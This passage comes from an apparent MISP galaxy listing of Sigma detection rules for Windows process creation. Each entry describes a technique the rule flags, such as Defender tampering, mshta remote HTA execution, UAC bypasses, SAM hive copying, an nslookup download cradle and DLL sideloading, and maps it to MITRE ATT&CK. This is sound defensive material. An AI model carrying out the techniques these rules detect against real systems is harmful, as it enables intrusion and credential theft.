  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 11076. Table References

Links

https://www.attackiq.com/2023/09/20/emulating-rhysida/

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper

https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml

Powershell Base64 Encoded MpPreference Cmdlet

Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV

The tag is: misp-galaxy:sigma-rules="Powershell Base64 Encoded MpPreference Cmdlet"

Powershell Base64 Encoded MpPreference Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11077. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://twitter.com/AdamTheAnalyst/status/1483497517119590403

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml

Parent in Public Folder Suspicious Process

This rule detects suspicious processes with parent images located in the C:\Users\Public folder

The tag is: misp-galaxy:sigma-rules="Parent in Public Folder Suspicious Process"

Parent in Public Folder Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11078. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml

New Service Creation Using PowerShell

Detects the creation of a new service using powershell.

The tag is: misp-galaxy:sigma-rules="New Service Creation Using PowerShell"

New Service Creation Using PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 11079. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_create_service.yml

OpenWith.exe Executes Specified Binary

OpenWith.exe executes another binary

The tag is: misp-galaxy:sigma-rules="OpenWith.exe Executes Specified Binary"

OpenWith.exe Executes Specified Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11080. Table References

Links

https://twitter.com/harr0ey/status/991670870384021504

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml

Scheduled Task Executing Encoded Payload from Registry

Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executing Encoded Payload from Registry"

Scheduled Task Executing Encoded Payload from Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11081. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call

Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call"

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11082. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml

Suspicious Schtasks From Env Var Folder

Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks From Env Var Folder"

Suspicious Schtasks From Env Var Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 11083. Table References

Links

https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/

https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml

Potential File Overwrite Via Sysinternals SDelete

Detects the use of SDelete to erase a file rather than the free space

The tag is: misp-galaxy:sigma-rules="Potential File Overwrite Via Sysinternals SDelete"

Potential File Overwrite Via Sysinternals SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11084. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml

Potential LethalHTA Technique Execution

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

The tag is: misp-galaxy:sigma-rules="Potential LethalHTA Technique Execution"

Potential LethalHTA Technique Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 11086. Table References

Links

https://codewhitesec.blogspot.com/2018/07/lethalhta.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml

Cloudflared Portable Execution

Detects the execution of the "cloudflared" binary from a non standard location.

The tag is: misp-galaxy:sigma-rules="Cloudflared Portable Execution"

Cloudflared Portable Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 11087. Table References

Links

https://github.com/cloudflare/cloudflared/releases

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://www.intrinsec.com/akira_ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml

Remote Access Tool - LogMeIn Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - LogMeIn Execution"

Remote Access Tool - LogMeIn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11088. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml

Visual Studio NodejsTools PressAnyKey Renamed Execution

Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries

The tag is: misp-galaxy:sigma-rules="Visual Studio NodejsTools PressAnyKey Renamed Execution"

Visual Studio NodejsTools PressAnyKey Renamed Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11089. Table References

Links

https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5

https://twitter.com/mrd0x/status/1463526834918854661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml

Invoke-Obfuscation COMPRESS OBFUSCATION

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION"

Invoke-Obfuscation COMPRESS OBFUSCATION has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11090. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml

Insecure Proxy/DOH Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.

The tag is: misp-galaxy:sigma-rules="Insecure Proxy/DOH Transfer Via Curl.EXE"

Table 11091. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml

MpiExec Lolbin

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

The tag is: misp-galaxy:sigma-rules="MpiExec Lolbin"

MpiExec Lolbin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11092. Table References

Links

https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps

https://twitter.com/mrd0x/status/1465058133303246867

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml

HackTool - F-Secure C3 Load by Rundll32

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

The tag is: misp-galaxy:sigma-rules="HackTool - F-Secure C3 Load by Rundll32"

HackTool - F-Secure C3 Load by Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 11093. Table References

Links

https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml

Potential Arbitrary DLL Load Using Winword

Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary DLL Load Using Winword"

Potential Arbitrary DLL Load Using Winword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11094. Table References

Links

https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml

Invoke-Obfuscation Obfuscated IEX Invocation

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation"

Invoke-Obfuscation Obfuscated IEX Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11096. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml

Suspicious Registry Modification From ADS Via Regini.EXE

Detects the import of an alternate data stream with regini.exe; regini.exe can be used to modify registry keys.

The tag is: misp-galaxy:sigma-rules="Suspicious Registry Modification From ADS Via Regini.EXE"

Suspicious Registry Modification From ADS Via Regini.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11097. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml

Potential Download/Upload Activity Using Type Command

Detects usage of the "type" command to download/upload data from a WebDAV server

The tag is: misp-galaxy:sigma-rules="Potential Download/Upload Activity Using Type Command"

Potential Download/Upload Activity Using Type Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11098. Table References

Links

https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_type.yml

Remotely Hosted HTA File Executed Via Mshta.EXE

Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file

The tag is: misp-galaxy:sigma-rules="Remotely Hosted HTA File Executed Via Mshta.EXE"

Remotely Hosted HTA File Executed Via Mshta.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 11099. Table References

Links

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml

Potential Memory Dumping Activity Via LiveKD

Detects execution of LiveKD based on PE metadata or image name

The tag is: misp-galaxy:sigma-rules="Potential Memory Dumping Activity Via LiveKD"

Table 11101. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/livekd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml

Suspicious Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

The tag is: misp-galaxy:sigma-rules="Suspicious Mstsc.EXE Execution With Local RDP File"

Suspicious Mstsc.EXE Execution With Local RDP File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11102. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml

Suspicious Extrac32 Execution

Download or copy of a file with Extrac32

The tag is: misp-galaxy:sigma-rules="Suspicious Extrac32 Execution"

Suspicious Extrac32 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11103. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml

Potential RDP Session Hijacking Activity

Detects potential RDP Session Hijacking activity on Windows systems

The tag is: misp-galaxy:sigma-rules="Potential RDP Session Hijacking Activity"

Table 11104. Table References

Links

https://twitter.com/Moti_B/status/909449115477659651

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml

Nslookup PowerShell Download Cradle - ProcessCreation

Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records

The tag is: misp-galaxy:sigma-rules="Nslookup PowerShell Download Cradle - ProcessCreation"

Table 11105. Table References

Links

https://twitter.com/Alh4zr3d/status/1566489367232651264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process

The tag is: misp-galaxy:sigma-rules="Suspicious Msbuild Execution By Uncommon Parent Process"

Table 11106. Table References

Links

https://www.echotrail.io/insights/search/msbuild.exe

https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml

Rar Usage with Password and Compression Level

Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.

The tag is: misp-galaxy:sigma-rules="Rar Usage with Password and Compression Level"

Rar Usage with Password and Compression Level has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11107. Table References

Links

https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://ss64.com/bash/rar.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious EventLog Recon Activity Using Log Query Utilities"

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11108. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://www.group-ib.com/blog/apt41-world-tour-2021/

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml

Renamed Office Binary Execution

Detects the execution of a renamed office binary

The tag is: misp-galaxy:sigma-rules="Renamed Office Binary Execution"

Table 11109. Table References

Links

https://infosec.exchange/@sbousseaden/109542254124022664

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml

Suspicious Advpack Call Via Rundll32.EXE

Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function

The tag is: misp-galaxy:sigma-rules="Suspicious Advpack Call Via Rundll32.EXE"

Table 11110. Table References

Links

http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/

https://twitter.com/Hexacorn/status/1224848930795552769

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml

TrustedPath UAC Bypass Pattern

Detects indicators of a UAC bypass method by mocking directories

The tag is: misp-galaxy:sigma-rules="TrustedPath UAC Bypass Pattern"

TrustedPath UAC Bypass Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 11111. Table References

Links

https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows

https://github.com/netero1010/TrustedPath-UACBypass-BOF

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

The tag is: misp-galaxy:sigma-rules="New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE"

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11112. Table References

Links

https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml

File Download Using Notepad++ GUP Utility

Detects execution of the Notepad updater (gup) from a process other than Notepad to download files.

The tag is: misp-galaxy:sigma-rules="File Download Using Notepad++ GUP Utility"

File Download Using Notepad++ GUP Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11113. Table References

Links

https://twitter.com/nas_bench/status/1535322182863179776

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_download.yml

PowerShell SAM Copy

Detects suspicious PowerShell scripts accessing SAM hives

The tag is: misp-galaxy:sigma-rules="PowerShell SAM Copy"

PowerShell SAM Copy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 11114. Table References

Links

https://twitter.com/splinter_code/status/1420546784250769408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml

HackTool - Certify Execution

Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.

The tag is: misp-galaxy:sigma-rules="HackTool - Certify Execution"

HackTool - Certify Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 11115. Table References

Links

https://github.com/GhostPack/Certify

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml

UAC Bypass Using NTFS Reparse Point - Process

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using NTFS Reparse Point - Process"

UAC Bypass Using NTFS Reparse Point - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 11116. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml

Renamed ProcDump Execution

Detects the execution of a renamed ProcDump executable often used by attackers or malware

The tag is: misp-galaxy:sigma-rules="Renamed ProcDump Execution"

Renamed ProcDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11117. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

The tag is: misp-galaxy:sigma-rules="Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location"

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11118. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml

PUA - Nimgrab Execution

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

The tag is: misp-galaxy:sigma-rules="PUA - Nimgrab Execution"

PUA - Nimgrab Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11119. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml

Application Whitelisting Bypass via Dxcap.exe

Detects execution of Dxcap.exe

The tag is: misp-galaxy:sigma-rules="Application Whitelisting Bypass via Dxcap.exe"

Application Whitelisting Bypass via Dxcap.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11120. Table References

Links

https://twitter.com/harr0ey/status/992008180904419328

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml

Potential Mpclient.DLL Sideloading Via Defender Binaries

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading Via Defender Binaries"

Potential Mpclient.DLL Sideloading Via Defender Binaries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11121. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml

Xwizard DLL Sideloading

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

The tag is: misp-galaxy:sigma-rules="Xwizard DLL Sideloading"

Xwizard DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11122. Table References

Links

http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml

Renamed CURL.EXE Execution

Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed CURL.EXE Execution"

Renamed CURL.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11123. Table References

Links

https://twitter.com/Kostastsale/status/1700965142828290260

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_curl.yml

RestrictedAdminMode Registry Value Tampering - ProcCreation

